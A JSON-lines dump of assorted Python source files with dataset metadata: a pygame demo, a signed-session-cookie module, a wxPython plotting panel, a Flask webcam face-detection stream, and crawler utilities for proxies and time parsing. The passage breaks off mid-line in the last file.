+{"seq_id": "253836064", "text": "import pygame\ndef main():\n #创建游戏窗口\n screen = pygame.display.set_mode((1250,750),0,32)\n #把本地文件夹的图片,获取倒 代码中\n background = pygame.image.load('./images/mm2.jpg')\n bad = pygame.image.load('./images/mm.jpg')\n #把图片加载倒游戏窗口上\n #screen.blit(background,(0,0))\n rect = pygame.Rect(-210,0,320,320)\n\n clock=pygame.time.Clock()#获得游戏时钟 控制器\n #刷新显示\n #pygame.display.update()\n #防止一闪而退\n while True:\n screen.blit(background,(0,0))\n screen.blit(bad,rect)\n #刷新显示\n #游戏事件的监听\n for event in pygame.event.get():\n print('event.type=',event.type)\n print('event=',event)\n if event.type == pygame.QUIT:#退出游戏\n print('游戏退出')\n pygame.quit()\n exit()#退出程序\n\n rect.x -= 150\n pygame.display.update()\n clock.tick(30)\n'''\nfeiji = pygame.Rect(100,500,50,50)\nprint('x=',feiji.x)\nprint('y=',feiji.y)\nprint('width=',feiji.width)\nprint('height=',feiji.height)\n'''\nif __name__== '__main__':\n main()\n", "sub_path": "第二月/于亮p12/飞机大战.py", "file_name": "飞机大战.py", "file_ext": "py", "file_size_in_byte": 1180, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "pygame.display.set_mode", "line_number": 4, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 4, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 6, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 6, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 7, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 7, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 10, "usage_type": "call"}, {"api_name": "pygame.time.Clock", "line_number": 12, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 24, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 26, "usage_type": "call"}, {"api_name": "pygame.display.update", "line_number": 30, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 30, "usage_type": "attribute"}]}
+{"seq_id": "156202570", "text": "from .helpers import izip, want_bytes, want_text\nimport base64\nimport hashlib\nimport hmac\nimport json\n\n\ndef b64e_raw(data):\n return want_text(base64.urlsafe_b64encode(data).rstrip(b'='))\n\n\ndef b64d_raw(data):\n data += u'=' * (-len(data) % 4)\n return base64.urlsafe_b64decode(want_bytes(data))\n\n\ndef _constant_time_compare(a, b):\n \"\"\"Returns True if the two strings are equal, False otherwise.\n\n The time taken is independent of the number of characters that match.\n\n For the sake of simplicity, this function executes in constant time only\n when the two strings have the same length. It short-circuits when they\n have different lengths.\n\n This is an alias of :func:`hmac.compare_digest` on Python>=2.7,3.3.\n \"\"\"\n a = want_bytes(a)\n b = want_bytes(b)\n if len(a) != len(b):\n return False\n result = 0\n for x, y in izip(bytearray(a), bytearray(b)):\n result |= x ^ y\n return result == 0\n\n\ndef safe_str_cmp(a, b):\n a = want_bytes(a)\n b = want_bytes(b)\n return getattr(hmac, 'compare_digest', _constant_time_compare)(a, b)\n\n\ndef get_hmac(key, data):\n k = hmac.new(key, b'malt-session', hashlib.sha256).digest()\n sig = hmac.new(k, data, hashlib.sha256).digest()\n return b64e_raw(sig)\n\n\ndef sign(key, data):\n return data + u'.' + get_hmac(key, want_bytes(data))\n\n\ndef unsign(key, data):\n if u'.' not in data:\n return None\n payload, sig = data.rsplit(u'.', 1)\n\n correct_sig = get_hmac(key, want_bytes(payload))\n if not safe_str_cmp(sig, correct_sig):\n return None\n\n return payload\n\n\ndef get_key(request):\n if 'SECRET_KEY' not in request.config:\n raise Exception(\"You must set config['SECRET_KEY'] to use sessions\")\n return want_bytes(request.config['SECRET_KEY'])\n\n\ndef open_session(request):\n key = get_key(request)\n cookie_name = request.config.get('SESSION_COOKIE_NAME', 'session')\n session_cookie = request.cookies.get(cookie_name)\n\n if session_cookie is None:\n return {}\n\n encoded = unsign(key, session_cookie)\n if encoded is None:\n return {}\n else:\n return json.loads(want_text(b64d_raw(encoded)))\n\n\ndef save_session(request, response):\n # We want the JSON to be small, and consistent (keys in sorted order)\n as_json = json.dumps(request.session, separators=(',', ':'),\n sort_keys=True)\n # Create the signed session cookie\n encoded = b64e_raw(want_bytes(as_json))\n session_cookie = sign(get_key(request), encoded)\n # Set the cookie\n cookie_name = request.config.get('SESSION_COOKIE_NAME', 'session')\n response.set_cookie(cookie_name, session_cookie)\n return response\n", "sub_path": "malt/sessions.py", "file_name": "sessions.py", "file_ext": "py", "file_size_in_byte": 2681, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "helpers.want_text", "line_number": 9, "usage_type": "call"}, {"api_name": "base64.urlsafe_b64encode", "line_number": 9, "usage_type": "call"}, {"api_name": "base64.urlsafe_b64decode", "line_number": 14, "usage_type": "call"}, {"api_name": "helpers.want_bytes", "line_number": 14, "usage_type": "call"}, {"api_name": "helpers.want_bytes", "line_number": 28, "usage_type": "call"}, {"api_name": "helpers.want_bytes", "line_number": 29, "usage_type": "call"}, {"api_name": "helpers.izip", "line_number": 33, "usage_type": "call"}, {"api_name": "helpers.want_bytes", "line_number": 39, "usage_type": "call"}, {"api_name": "helpers.want_bytes", "line_number": 40, "usage_type": "call"}, {"api_name": "hmac.new", "line_number": 45, "usage_type": "call"}, {"api_name": "hashlib.sha256", "line_number": 45, "usage_type": "attribute"}, {"api_name": "hmac.new", "line_number": 46, "usage_type": "call"}, {"api_name": "hashlib.sha256", "line_number": 46, "usage_type": "attribute"}, {"api_name": "helpers.want_bytes", "line_number": 51, "usage_type": "call"}, {"api_name": "helpers.want_bytes", "line_number": 59, "usage_type": "call"}, {"api_name": "helpers.want_bytes", "line_number": 69, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 84, "usage_type": "call"}, {"api_name": "helpers.want_text", "line_number": 84, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 89, "usage_type": "call"}, {"api_name": "helpers.want_bytes", "line_number": 92, "usage_type": "call"}]}
+{"seq_id": "641444084", "text": "# uncompyle6 version 3.7.4\n# Python bytecode 2.5 (62131)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-i686/egg/epscApp/plotPanel.py\n# Compiled at: 2009-05-29 13:49:10\nimport wx, sys\nfrom SCMPanel import SCMPanel\n\nclass PlotPanel(wx.Panel, SCMPanel):\n \"\"\" panel for plotting\n \"\"\"\n\n def __init__(self, *args, **kwds):\n SCMPanel.__init__(self, *args, **kwds)\n wx.Panel.__init__(self, *args, **kwds)\n self.sizer_4_staticbox = wx.StaticBox(self, -1, 'Neutron')\n self.sizer_3_staticbox = wx.StaticBox(self, -1, 'Macro')\n self.macroModelCheck = wx.CheckBox(self, -1, 'Model Result')\n self.macroExpCheck = wx.CheckBox(self, -1, 'Experiment Data')\n self.neutronModelCheck = wx.CheckBox(self, -1, 'Model Result')\n self.neutronExpCheck = wx.CheckBox(self, -1, 'Experiment Data')\n self.macroModelCheck.SetValue(True)\n self.macroExpCheck.SetValue(True)\n self.neutronModelCheck.SetValue(True)\n self.neutronExpCheck.SetValue(True)\n self.static_line_1 = wx.StaticLine(self, -1)\n self.plotButton = wx.Button(self, -1, 'Plot')\n self.resetButton = wx.Button(self, -1, 'Reset')\n self.gauge = wx.Gauge(self, -1, 50, (110, 95), (210, 20))\n self.__set_properties()\n self.__do_layout()\n self.Bind(wx.EVT_BUTTON, self.onPlot, self.plotButton)\n self.Bind(wx.EVT_BUTTON, self.onReset, self.resetButton)\n\n def __set_properties(self):\n pass\n\n def __do_layout(self):\n sizer_1 = wx.BoxSizer(wx.VERTICAL)\n sizer_2 = wx.BoxSizer(wx.HORIZONTAL)\n sizer_6 = wx.BoxSizer(wx.HORIZONTAL)\n sizer_4 = wx.StaticBoxSizer(self.sizer_4_staticbox, wx.VERTICAL)\n sizer_3 = wx.StaticBoxSizer(self.sizer_3_staticbox, wx.VERTICAL)\n sizer_3.Add(self.macroModelCheck, 1, wx.LEFT | wx.ADJUST_MINSIZE, 10)\n sizer_3.Add(self.macroExpCheck, 1, wx.LEFT | wx.ADJUST_MINSIZE, 10)\n sizer_1.Add(sizer_3, 1, wx.EXPAND, 10)\n sizer_4.Add(self.neutronModelCheck, 1, wx.LEFT | wx.ADJUST_MINSIZE | wx.EXPAND, 10)\n sizer_4.Add(self.neutronExpCheck, 1, wx.LEFT | wx.ADJUST_MINSIZE | wx.EXPAND, 10)\n sizer_1.Add(sizer_4, 1, wx.EXPAND, 10)\n sizer_1.Add(sizer_6, 1, wx.EXPAND, 0)\n sizer_1.Add(self.static_line_1, 0, wx.BOTTOM | wx.EXPAND, 5)\n sizer_2.Add(self.plotButton, 0, wx.BOTTOM | wx.LEFT | wx.RIGHT | wx.ADJUST_MINSIZE, 5)\n sizer_2.Add(self.resetButton, 0, wx.BOTTOM | wx.LEFT | wx.RIGHT | wx.ADJUST_MINSIZE, 5)\n sizer_1.Add(sizer_2, 0, wx.EXPAND, 0)\n sizer_1.Add(self.gauge, 0, wx.EXPAND, 0)\n self.SetAutoLayout(True)\n self.SetSizer(sizer_1)\n\n def enableWidgets(self, on=True):\n \"\"\"Enable or disable the widgets.\"\"\"\n self.macroDataList.Enable(on)\n self.neutronDataList.Enable(on)\n self.resetButton.Enable(on)\n self.plotButton.Enable(on)\n\n def onPlot(self, event):\n \"\"\"Plot some stuff.\"\"\"\n self.Parent.clearPlots()\n self.Parent.OnPlot(None)\n if self.macroModelCheck.GetValue() == True:\n if self.controller.epscData.flagRun == False:\n msg = 'You should run the model to plot!'\n dlg = wx.MessageDialog(self, msg, 'Warning', wx.OK)\n dlg.ShowModal()\n dlg.Destroy()\n return\n if self.macroExpCheck.GetValue() == True:\n self.macro = 2\n else:\n self.macro = 1\n self.controller.plotEngine.plotMacroTop(self.Parent, self.macro)\n elif self.macroExpCheck.GetValue() == True:\n self.macro = 3\n if self.controller.epscData.expData.checkFlagOn('expData'):\n self.controller.plotEngine.plotMacroTop(self.Parent, self.macro)\n else:\n msg = 'You should input the experimental files to plot!'\n dlg = wx.MessageDialog(self, msg, 'Warning', wx.OK)\n dlg.ShowModal()\n dlg.Destroy()\n return\n else:\n self.macro = 0\n if self.neutronModelCheck.GetValue() == True:\n if self.controller.epscData.flagRun == False:\n msg = 'You should run the model to plot!'\n dlg = wx.MessageDialog(self, msg, 'Warning', wx.OK)\n dlg.ShowModal()\n dlg.Destroy()\n return\n if self.neutronExpCheck.GetValue() == True:\n self.neutron = 2\n else:\n self.neutron = 1\n self.controller.plotEngine.plotNeutronTop(self.Parent, self.neutron)\n elif self.neutronExpCheck.GetValue() == True:\n self.neutron = 3\n if self.controller.epscData.expData.checkFlagOn('expData'):\n if self.controller.epscData.diffractionDataSaved:\n self.controller.plotEngine.plotNeutronTop(self.Parent, self.neutron)\n else:\n msg = 'You should input the diffraction data to plot!'\n dlg = wx.MessageDialog(self, msg, 'Warning', wx.OK)\n dlg.ShowModal()\n dlg.Destroy()\n return\n else:\n msg = 'You should input the experimental files to plot!'\n dlg = wx.MessageDialog(self, msg, 'Warning', wx.OK)\n dlg.ShowModal()\n dlg.Destroy()\n return\n else:\n self.neutron = 0\n return\n\n def onReset(self, event):\n \"\"\"Reset everything.\"\"\"\n self.macroExpCheck.SetValue(False)\n self.macroModelCheck.SetValue(False)\n self.neutronExpCheck.SetValue(False)\n self.neutronModelCheck.SetValue(False)\n\n def _check(self, event):\n try:\n self._plot(None)\n self.plotButton.Enable()\n except ControlConfigError:\n self.plotButton.Disable()\n\n return\n\n def disableButton(self):\n self.plotButton.Enable(False)\n\n def enableButton(self):\n self.plotButton.Enable(True)\n\n\nif __name__ == '__main__':\n app = wx.PySimpleApp()\n wx.InitAllImageHandlers()\n frame = wx.Frame(None, -1, 'dynamic test', size=(800, 900))\n panel = PlotPanel(frame)\n app.SetTopWindow(frame)\n frame.Show()\n app.MainLoop()", "sub_path": "pycfiles/SCM-1.0alpha-py2.5/plotPanel.py", "file_name": "plotPanel.py", "file_ext": "py", "file_size_in_byte": 6396, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "wx.Panel", "line_number": 10, "usage_type": "attribute"}, {"api_name": "SCMPanel.SCMPanel", "line_number": 10, "usage_type": "name"}, {"api_name": "SCMPanel.SCMPanel.__init__", "line_number": 15, "usage_type": "call"}, {"api_name": "SCMPanel.SCMPanel", "line_number": 15, "usage_type": "name"}, {"api_name": "wx.Panel.__init__", "line_number": 16, "usage_type": "call"}, {"api_name": "wx.Panel", "line_number": 16, "usage_type": "attribute"}, {"api_name": "wx.StaticBox", "line_number": 17, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 18, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 19, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 20, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 21, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 22, "usage_type": "call"}, {"api_name": "wx.StaticLine", "line_number": 27, "usage_type": "call"}, {"api_name": "wx.Button", "line_number": 28, "usage_type": "call"}, {"api_name": "wx.Button", "line_number": 29, "usage_type": "call"}, {"api_name": "wx.Gauge", "line_number": 30, "usage_type": "call"}, {"api_name": "wx.EVT_BUTTON", "line_number": 33, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 34, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 40, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 40, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 41, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 41, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 42, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 42, "usage_type": "attribute"}, {"api_name": "wx.StaticBoxSizer", "line_number": 43, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 43, "usage_type": "attribute"}, {"api_name": "wx.StaticBoxSizer", "line_number": 44, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 44, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 45, "usage_type": "attribute"}, {"api_name": "wx.ADJUST_MINSIZE", "line_number": 45, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 46, "usage_type": "attribute"}, {"api_name": "wx.ADJUST_MINSIZE", "line_number": 46, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 47, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 48, "usage_type": "attribute"}, {"api_name": "wx.ADJUST_MINSIZE", "line_number": 48, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 48, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 49, "usage_type": "attribute"}, {"api_name": "wx.ADJUST_MINSIZE", "line_number": 49, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 49, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 50, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 51, "usage_type": "attribute"}, {"api_name": "wx.BOTTOM", "line_number": 52, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 52, "usage_type": "attribute"}, {"api_name": "wx.BOTTOM", "line_number": 53, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 53, "usage_type": "attribute"}, {"api_name": "wx.RIGHT", "line_number": 53, "usage_type": "attribute"}, {"api_name": "wx.ADJUST_MINSIZE", "line_number": 53, "usage_type": "attribute"}, {"api_name": "wx.BOTTOM", "line_number": 54, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 54, "usage_type": "attribute"}, {"api_name": "wx.RIGHT", "line_number": 54, "usage_type": "attribute"}, {"api_name": "wx.ADJUST_MINSIZE", "line_number": 54, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 55, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 56, "usage_type": "attribute"}, {"api_name": "wx.MessageDialog", "line_number": 74, "usage_type": "call"}, {"api_name": "wx.OK", "line_number": 74, "usage_type": "attribute"}, {"api_name": "wx.MessageDialog", "line_number": 89, "usage_type": "call"}, {"api_name": "wx.OK", "line_number": 89, "usage_type": "attribute"}, {"api_name": "wx.MessageDialog", "line_number": 98, "usage_type": "call"}, {"api_name": "wx.OK", "line_number": 98, "usage_type": "attribute"}, {"api_name": "wx.MessageDialog", "line_number": 114, "usage_type": "call"}, {"api_name": "wx.OK", "line_number": 114, "usage_type": "attribute"}, {"api_name": "wx.MessageDialog", "line_number": 120, "usage_type": "call"}, {"api_name": "wx.OK", "line_number": 120, "usage_type": "attribute"}, {"api_name": "wx.PySimpleApp", "line_number": 152, "usage_type": "call"}, {"api_name": "wx.InitAllImageHandlers", "line_number": 153, "usage_type": "call"}, {"api_name": "wx.Frame", "line_number": 154, "usage_type": "call"}]}
+{"seq_id": "237653674", "text": "import time\nimport cv2\nfrom flask import Flask, render_template, Response, request\nimport json\nimport pika\nfrom flask_cors import CORS, cross_origin\nimport numpy as np\n\napp = Flask(__name__)\ncors = CORS(app)\napp.config['CORS_HEADERS'] = 'Content-Type'\n\nconnection = pika.BlockingConnection()\nchannel = connection.channel()\n\nchannel.queue_declare(queue='counter')\n\n\n@app.route('/')\n@cross_origin()\ndef index():\n return render_template('index.html')\n\n\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n\nprevious_faces_length = 0\nfaceId = 55\n\n\ndef gen(id):\n \"\"\"Video streaming generator function.\"\"\"\n #cap = cv2.VideoCapture('f2.mp4')\n cap = cv2.VideoCapture(0)\n\n # Read until video is completed\n while(cap.isOpened()):\n # Capture frame-by-frame\n\n ret, img = cap.read()\n if ret == True:\n img = cv2.resize(img, (0, 0), fx=0.5, fy=0.5)\n\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n # Detect the faces\n faces = face_cascade.detectMultiScale(gray, 1.2, 4)\n\n # print(\"FACES COUNT: {}\".format(len(faces)))\n # Draw the rectangle around each face\n for (x, y, w, h) in faces:\n cv2.rectangle(img, (x, y), (x+w, y+h), (255, 0, 0), 2)\n\n #global faceId\n\n #print('FaceID: {}'.format(faceId))\n # cv2.imshow('img', img)\n # ovde treba da stoji img\n global previous_faces_length\n\n print('PREV FACES LEN {}'.format(previous_faces_length))\n print('FACES LEN {} '.format(len(faces)))\n\n if id is not None:\n previous_faces_length = 0\n print('ID: {}'.format(id))\n x, y, w, h = faces[int(id)]\n face_to_show = faces = img[-70 +\n y:y + h + 70, -70 + x:x + w + 70]\n frame = cv2.imencode('.jpg', face_to_show)[1].tobytes()\n yield (b'--frame\\r\\n'b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n')\n time.sleep(0.1)\n\n # faces = faces[int(id)]\n previous_faces_length = 0\n else:\n frame = cv2.imencode('.jpg', img)[1].tobytes()\n yield (b'--frame\\r\\n'b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n')\n time.sleep(0.1)\n\n if len(faces) != previous_faces_length:\n # XD\n if (len(faces) > 10):\n continue\n previous_faces_length = len(faces)\n\n # print('Poslato za lice')\n json_payload = json.dumps({'faces': previous_faces_length})\n channel.basic_publish(exchange='',\n routing_key='counter',\n body=json_payload)\n else:\n break\n\n\n@app.route('/video_feed')\n@cross_origin()\ndef video_feed():\n \"\"\"Video streaming route. Put this in the src attribute of an img tag.\"\"\"\n id = request.args.get('id')\n\n return Response(gen(id),\n mimetype='multipart/x-mixed-replace; boundary=frame')\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 3208, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "flask.Flask", "line_number": 9, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 10, "usage_type": "call"}, {"api_name": "pika.BlockingConnection", "line_number": 13, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 22, "usage_type": "call"}, {"api_name": "flask_cors.cross_origin", "line_number": 20, "usage_type": "call"}, {"api_name": "cv2.CascadeClassifier", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 42, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 44, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 44, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 51, "usage_type": "call"}, {"api_name": "cv2.imencode", "line_number": 69, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 71, "usage_type": "call"}, {"api_name": "cv2.imencode", "line_number": 76, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 78, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 87, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 99, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 99, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 99, "usage_type": "name"}, {"api_name": "flask.Response", "line_number": 101, "usage_type": "call"}, {"api_name": "flask_cors.cross_origin", "line_number": 96, "usage_type": "call"}]}
+{"seq_id": "127396055", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\"\"\"\n@author: Alex\n@date: 2020/04/23 08:46:25\n@file: common_requests.py\n@usage: 工具方法,随机睡眠, 去除特殊字符等\n\"\"\"\nimport sys\nsys.setdefaultencoding('utf-8')\nsys.path.append('/home/work/data/crawler3/crawler3_py/develop_jobs')\n\nimport chardet\nimport hashlib\nimport json\nimport random\nimport re\nimport six\nimport time\n\nimport requests\n\nfrom common_tools import config, exception\n\n\nDATE_PATTERN = re.compile('(\\d{4}[-/年.]\\d{1,2}[-/月.]\\d{1,2}日?)')\nTIME_PATTERN = re.compile('(\\d{1,2}[时|:]\\d{1,2}[分|:]?(\\d{1,2}秒?)?)')\nSECOND_PATTERN = re.compile(r'\\d{1,2}:\\d{1,2}:\\d{1,2}')\nMINUTE_PATTERN = re.compile(r'\\d{1,2}:\\d{1,2}')\nIP_PATTERN = re.compile(r'(\\d+\\.\\d+\\.\\d+\\.\\d+)')\n\n\ndef random_sleep_time(start=1, stop=5):\n \"\"\"\n 随机睡眠\n :param start: 最少时间,默认1\n :param stop: 最大时间,默认5\n :return:\n \"\"\"\n if not (isinstance(start, int) and isinstance(stop, int)):\n raise TypeError('start or stop value must be a integer.')\n if start > stop:\n raise ValueError('start value must be less than stop value.')\n # assert isinstance(start, int), 'start must be a integer.'\n # assert isinstance(stop, int), 'stop must be a integer.'\n # assert start <= stop, 'start value must be less than stop value.'\n\n time.sleep(random.randint(start, stop))\n\n\ndef make_md5(text):\n \"\"\"\n 对字符串进行md5加密\n :param text:\n :return:\n \"\"\"\n md5_text = hashlib.md5(text.encode('utf-8')).hexdigest()\n return md5_text\n\n\ndef make_sha256(text):\n \"\"\"\n 对字符串进行sha256加密\n :param text:\n :return:\n \"\"\"\n sha256_text = hashlib.sha256(text.encode('utf-8')).hexdigest()\n return sha256_text\n\n\ndef replace_escape_chars(text, which_ones=('\\n', '\\t', '\\r',u'\\u3000',u'\\xa0','\\v',' '), replace_by=u'', encoding=None):\n \"\"\"\n #去除\\n,\\t,\\r等特殊字符\n \"\"\"\n def to_unicode(text, encoding=None, errors='strict'):\n if isinstance(text, six.text_type):\n return text\n if not isinstance(text, (bytes, six.text_type)):\n raise TypeError('to_unicode must receive a bytes, str or unicode '\n 'object, got %s' % type(text).__name__)\n if encoding is None:\n encoding = 'utf-8'\n return text.decode(encoding, errors)\n \n text = to_unicode(text, encoding)\n for ec in which_ones:\n text = text.replace(ec, replace_by)\n return text\n\n\ndef get_zhima_proxy():\n \"\"\"\n 获取芝麻代理\n :return:\n \"\"\"\n try:\n res = requests.get(url=config.PROXY_GET_URL).json()\n if res.get('code') == 0:\n return res.pop('proxies')\n else:\n raise exception.GetProxyError('proxy pool error, please check')\n except Exception as ex:\n raise exception.GetProxyError('get zhima proxy error, {}'.format(ex))\n\n\ndef put_zhima_proxy(proxy, is_failed=False):\n \"\"\"\n 回收芝麻代理, 将failed_times加一\n :param proxy:\n :param is_failed:\n :return:\n \"\"\"\n try:\n data = {\n 'proxies': proxy,\n 'is_failed': is_failed\n }\n res = requests.post(url=config.PROXY_PUT_URL, json=data).json()\n if res.get('code') != 0:\n raise exception.PutProxyError('proxy pool error, please check')\n except Exception as ex:\n raise exception.PutProxyError('put zhima proxy error, {}'.format(ex))\n\n\ndef get_zhima_ip(num=1):\n \"\"\"\n 从芝麻站点获取IP\n :param num:\n :return:\n \"\"\"\n try:\n proxy_url = re.sub(r'num=\\d+', r'num={}'.format(num), config.ZHIMA_PROXY_URL)\n response = requests.get(url=proxy_url, headers=config.DEFAULT_HEADERS)\n if '\"success\":false' not in response.text:\n temps = response.text.strip('\\r\\n').split('\\r\\n')\n ip_list = []\n for temp in temps:\n proxy = {}\n proxy['http'] = 'http://{}'.format(temp)\n proxy['https'] = 'https://{}'.format(temp)\n ip_list.append(proxy)\n return ip_list\n raise exception.GetProxyError('get zhima proxy error, {}'.format(response.text))\n except Exception as ex:\n raise exception.GetProxyError('get zhima proxy error, {}'.format(ex))\n\n\ndef add_zhima_white(response):\n try:\n ip_addr = ''.join(IP_PATTERN.findall(response.text))\n white_url = config.WHITE_URL + ip_addr\n requests.get(url=white_url, headers=config.DEFAULT_HEADERS)\n except Exception as ex:\n raise exception.GetProxyError('requests add zhima white error, {}'.format(ex))\n\n\ndef get_abuyun_proxy():\n \"\"\"\n 设置阿布云代理\n :return:\n \"\"\"\n proxy_meta = \"http://%(user)s:%(pass)s@%(host)s:%(port)s\" % {\n \"host\": config.ABUYUN_PROXY.get('host'),\n \"port\": config.ABUYUN_PROXY.get('port'),\n \"user\": config.ABUYUN_PROXY.get('username'),\n \"pass\": config.ABUYUN_PROXY.get('password'),\n }\n proxies = {\n \"http\": proxy_meta,\n \"https\": proxy_meta,\n }\n return proxies\n\n\ndef get_dobel_proxy():\n \"\"\"\n 设置多贝云代理\n :return:\n \"\"\"\n proxy_meta = \"http://%(user)s:%(pass)s@%(host)s:%(port)s\" % {\n \"host\": config.DOBEL_PROXY.get('host'),\n \"port\": config.DOBEL_PROXY.get('port'),\n \"user\": config.DOBEL_PROXY.get('username'),\n \"pass\": config.DOBEL_PROXY.get('password'),\n }\n proxies = {\n \"http\": proxy_meta,\n \"https\": proxy_meta,\n }\n return proxies\n\n\ndef switch_ip(proxy):\n \"\"\"\n 隧道代理,手动切换IP\n :param proxy:\n :return:\n \"\"\"\n if not proxy:\n raise exception.GetProxyError('switch ip error, proxy is wrong')\n\n proxy_str = json.dumps(proxy)\n if config.ABUYUN_PROXY.get('host') in proxy_str:\n switch_url = config.ABUYUN_SWITCH_IP\n elif config.DOBEL_PROXY.get('host') in proxy_str:\n switch_url = config.DOBEL_SWITCH_IP\n else:\n raise ValueError('switch ip error, proxy value error')\n try:\n requests.get(switch_url, proxies=proxy, headers=config.DEFAULT_HEADERS)\n except requests.RequestException as ex:\n raise exception.GetProxyError('requests switch ip error, {}'.format(ex))\n\n\ndef coding(response):\n \"\"\"\n 设置编码\n :param response:\n :return:\n \"\"\"\n if not isinstance(response, requests.Response):\n raise ValueError('type of response is wrong, must be .')\n\n if config.CHARTSET_RE.findall(response.text):\n response.encoding = config.CHARTSET_RE.findall(response.text)[0]\n elif config.PRAGMA_RE.findall(response.text):\n response.encoding = config.PRAGMA_RE.findall(response.text)[0]\n else:\n temp = chardet.detect(response.content)\n response.encoding = temp['encoding']\n return response\n\n\ndef format_time(time_str):\n time_str = transform_time(time_str=time_str)\n return clean_time(time_str=time_str)\n\n\ndef transform_time(time_str):\n if u'小时' in time_str:\n add_hour = re.findall(u'(.*?)小时', time_str)\n if add_hour:\n add_hour = add_hour[0]\n else:\n add_hour = '0'\n year = time.strftime('%Y')\n month = time.strftime('%m')\n day = int(time.strftime('%d'))\n hour = int(time.strftime('%H')) - int(add_hour)\n if hour < 0:\n day = day - 1\n hour = 24 + hour\n if hour < 10:\n hour = '0{}'.format(hour)\n minute = time.strftime('%M')\n time_str = u'{}-{}-{} {}:{}'.format(year, month, day, hour, minute)\n elif u'分钟' in time_str:\n add_minute = re.findall(u'(.*?)分钟', time_str)\n if add_minute:\n add_minute = add_minute[0]\n else:\n add_minute = '0'\n year = time.strftime('%Y')\n month = time.strftime('%m')\n day = time.strftime('%d')\n hour = int(time.strftime('%H'))\n minute = int(time.strftime('%M')) - int(add_minute)\n if minute < 0:\n hour = hour - 1\n minute = 60 + minute\n if minute < 10:\n minute = '0{}'.format(minute)\n if hour < 10:\n hour = '0{}'.format(hour)\n time_str = u'{}-{}-{} {}:{}'.format(year, month, day, hour, minute)\n return time_str\n\n\ndef clean_time(time_str):\n date_temp = re.findall(DATE_PATTERN, time_str) or ['']\n time_temp = re.findall(TIME_PATTERN, time_str) or [('',)]\n\n date_str = date_temp[0]\n time_str = time_temp[0][0]\n\n date_str = date_str.replace(u'年', '-').replace(u'月', '-').replace(u'日', '').replace(r'/', '-').replace(r'.', '-')\n time_str = time_str.replace(u'时', ':').replace(u'分', ':').replace(u'秒', 